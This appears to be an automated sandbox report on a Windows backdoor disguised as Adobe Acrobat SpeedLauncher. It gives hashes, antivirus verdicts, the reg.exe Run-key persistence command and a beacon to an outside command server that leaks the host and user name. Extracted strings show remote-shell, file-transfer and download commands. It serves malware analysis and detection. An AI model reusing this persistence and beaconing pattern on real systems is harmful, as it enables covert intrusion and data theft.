Analysis Date2014-01-03 10:51:54
MD51ce4605e771a04e375e0d1083f183e8e
SHA18351103946b0664ace5384b09a978fdf49c85b90

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 0fe9ed26ee8dac2ad66f17fe931e5cc4 sha1: 569a2df945e22f828a868388e0623aafe89122f7 size: 9728
Section.rdata md5: 7df1e22dadbdcf85ea4f531e5aa7147e sha1: 82afd757494f7bf09292f2f0e6cda5e20e72580f size: 3072
Section.data md5: 634afa8a8a75905583d99417ab7a28e3 sha1: 97d25c49beaf7920ca45daaaf5a74208608e0861 size: 2560
Section.rsrc md5: 9721dcc7e94f7acf151c715cd34476f4 sha1: 824b27c0ee844c7b06592beed30ac3c561db1cf3 size: 1024
Timestamp2009-02-05 07:14:01
VersionLegalCopyright: Copyright Adobe Systems Incorporated 2004
FileVersion: 8, 0, 0, 0
CompanyName: Adobe Systems Incorporated
Comments:
ProductName: Adobe Acrobat
ProductVersion: 8, 0, 0, 0
FileDescription: Adobe Acrobat SpeedLauncher
OriginalFilename: AcroSpeedLaunch.exe
PackerMicrosoft Visual C++ v6.0
PEhash9cdb7e791d9adb73e14aee04eea88c3006d3c666
AVArcabit (arcavir)Gen:Variant.Graftor.54419
AVAuthentiumW32/Threat-SysAdderSml!Eldorado
AVGrisoft (avg)Error Scanning File
AVAvira (antivir)TR/Downloader.Gen
AVAlwil (avast)Trojan-gen
AVAlwil (avast)Win32:Trojan-gen
AVAd-AwareGen:Variant.Graftor.54419
AVBitDefenderGen:Variant.Graftor.54419
AVBullGuardGen:Variant.Graftor.54419
AVClamAVWin.Downloader.74679-1
AVDr. WebTrojan.DownLoader5.18772
AVEmsisoftGen:Variant.Graftor.54419
AVMicroWorld (escan)Gen:Variant.Graftor.54419
AVCA (E-Trust Ino)Gen:Variant.Graftor.54419
AVFortinetW32/Agent.OIJ!tr
AVFrisk (f-prot)W32/Threat-SysAdderSml!Eldorado
AVF-SecureGen:Variant.Graftor.54419
AVIkarusTrojan-Dropper.Agent
AVK7Trojan ( 000e9c581 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesNo Virus
AVMcafeeBackDoor-FALR!1CE4605E771A
AVMicrosoft Security EssentialsBackdoor:Win32/Likseput.A
AVNANOTrojan.Win32.Agent.brpqg
AVEset (nod32)Win32/Agent.OIG
AVPadvishMalware.Trojan.Downloader-74679
AVCAT (quickheal)Backdoor.Likseput.B3
AVRisingTrojan.Win32.Generic.1444B634
AV360 SafeNo Virus
AVSUPERAntiSpywareNo Virus
AVSymantecTrojan Horse
AVTrend MicroTROJ_DLOADER.YXJ
AVTwisterTrojan.9C0E0050BD8AEFA0
AVVirusBlokAda (vba32)TrojanDownloader.Agent
AVWindows DefenderBackdoor:Win32/Likseput.A
AVZillya!No Virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\reader_sl.exe
Creates Processreg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Adobe Reader Speed Launcher /d C:\Documents and Settings\Administrator\Application Data\Adobe\reader_sl.exe /f
Creates MutexGLOBAL\ADR32
Winsock URLhttp://www.keenathomas.com/index.htm

Process
↳ reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Adobe Reader Speed Launcher /d C:\Documents and Settings\Administrator\Application Data\Adobe\reader_sl.exe /f

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Adobe Reader Speed Launcher ➝
C:\Documents and Settings\Administrator\Application Data\Adobe\reader_sl.exe\\x00

Network Details:

DNSkeenathomas.com
Type: A
66.147.244.131
DNSwww.keenathomas.com
Type: A
HTTP GEThttp://www.keenathomas.com/index.htm
User-Agent: 5.1 02:14 COMPUTER-XXXXXX\Administrator
Flows TCP192.168.1.1:1031 ➝ 66.147.244.131:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e68 746d2048   GET /index.htm H
0x00000010 (00016)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000020 (00032)   656e743a 20352e31 2030323a 31342043   ent: 5.1 02:14 C
0x00000030 (00048)   4f4d5055 5445522d 58585858 58585c41   OMPUTER-XXXXXX\A
0x00000040 (00064)   646d696e 69737472 61746f72 0d0a486f   dministrator..Ho
0x00000050 (00080)   73743a20 7777772e 6b65656e 6174686f   st: www.keenatho
0x00000060 (00096)   6d61732e 636f6d0d 0a436163 68652d43   mas.com..Cache-C
0x00000070 (00112)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000080 (00128)   0d0a0d0a                              ....


Strings
040904e4
8, 0, 0, 0
AcroSpeedLaunch.exe
Adobe Acrobat
Adobe Acrobat SpeedLauncher
Adobe Systems Incorporated
Comments
CompanyName
Copyright Adobe Systems Incorporated 2004
FileDescription
FileVersion
LegalCopyright
OriginalFilename
ProductName
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
090205
%-24s %s
%-26s %5d
??2@YAPAXI@Z
??3@YAXPAX@Z
Accept:*/*
_acmdln
add "HKCU\%s" /v "%s" /d "%s" /f
_adjust_fdiv
Adobe Reader Speed Launcher
ADVAPI32.dll
AllocConsole
 and the PID is %d
\Application Data\Adobe\reader_sl.exe
border=
Cache-Control:max-age=0
Cache-Control:no-cache
CD-ROM		
CloseHandle
CloseServiceHandle
\cmd.exe
CmdPath=
Computer:
%ComSpec%
CONIN$
Content-Length: %d
_controlfp
ControlService
ControlService failed!
CopyFileA
CreateDirectoryA
Create failed with %d!
CreateFileA
CreateMutexA
CreatePipe
CreateProcessA
CreateProcessAsUserA
CreateProcess failed!
CreateThread
CreateToolhelp32Snapshot
__CxxFrameHandler
@.data
%d.%d %02d:%02d %s\%s
_EH_prolog
EnumServicesStatusExA
_except_handler3
ExitProcess
ExpandEnvironmentStringsA
Failed!
FileSize:	%d
Fixed		
GetComputerNameA
GetConsoleDisplayMode
GetCurrentProcess
GetDriveTypeA
GetExitCodeProcess
GetFileAttributesA
GetFileAttributes Error code: %d
GetFileSize
GetLastError
GetLocalTime
GetLogicalDrives
__getmainargs
GetModuleFileNameA
GetModuleHandleA
GetStartupInfoA
GetSystemDirectoryA
geturl
GetUserNameA
GetUserNameExA
GetUserProfileDirectoryA
GetVersionExA
GetVolumeInformationA
GetWindowsDirectoryA
GLOBAL\ADR32
<h1>Bad Request (Invalid Hostname)</h1>
HttpAddRequestHeadersA
HttpOpenRequestA
HttpSendRequestA
IE 8.5
_initterm
InternetCloseHandle
InternetConnectA
InternetOpenA
InternetOpenUrlA
InternetQueryOptionA
InternetReadFile
InternetSetOptionA
Invalid		
KERNEL32.dll
list process failed!
list service failed!
lstrcatA
lstrlenA
memcpy
memset
Mozilla/5.0
~MS80547.bat
MSVCRT.dll
OpenP failed with %d!
OpenProcess
OpenProcessToken
OpenSCManagerA
OpenSCManager failed!
OpenServiceA
OpenService failed!
OpenT failed with %d!
__p__commode
PeekNamedPipe
__p__fmode
pidrun
Pragma:no-cache
Process32First
Process32Next
Process cmd.exe exited!
Program started!
Proxy-Connection:Keep-Alive
PVVj VV
PVVVWV
PVVVWVV
Ramdisk		
`.rdata
ReadFile
RegCloseKey
RegCreateKeyExA
RegDeleteValueA
reg.exe
Remote		
Removeable		
%*[^/]%*[/]%*[^/]%s
%s Connected!
Secur32.dll
Service does not exist!
Service doesn't start!
Service is running already!
Service started!
Service still running!
Service stopped!
Service stop pending!
__set_app_type
SetCurrentDirectoryA
SetStdHandle
__setusermatherr
SHELL32.dll
ShellExecuteA
Shell started fail!
Shell started successfully!
Shell started,wait to terminate it.....
Sleep Time:
Software\Microsoft\Windows\CurrentVersion\Run
So long!
sprintf
sscanf
SSSh<W@
SSSVSS
Started already,
StartServiceA
StartService failed!
Start shell first.
strcat
strchr
_strcmpi
strcpy
strlen
_strnicmp
strrchr
strstr
Syntax error!
Syntax error!	Usage:	getf/putf FileName <N>
Syntax error!	Usage:	GetUrl URL FileName
Syntax error!	Usage:	kill </p|/s> <pid|ServiceName>
Syntax error!	Usage:	list </p|/s|/d>
Syntax error!	Usage:	start </p|/s> <filename|ServiceName>
t0V<#u
t4j SV3
\tasks
TerminateProcess
!This program cannot be run in DOS mode.
t<Ht2Ht(Ht
t:h(U@
Totally %d volumes found.
Unkown		
URLDownloadToFileA
urlmon.dll
USERENV.dll
Volume on this computer:
Volume	Type		Volume Name
W95hX@
WaitForSingleObject
whoami
width=
WININET.dll
WPh@R@
WriteConsoleInputA
WriteFile
_XcptFilter
Yt7@PV
YtEj/U
YYSSSSS
YYSSSVSS
YYSSVUS
YYt5j\
YYWWVh50@
YYWWVhp/@
ZbRich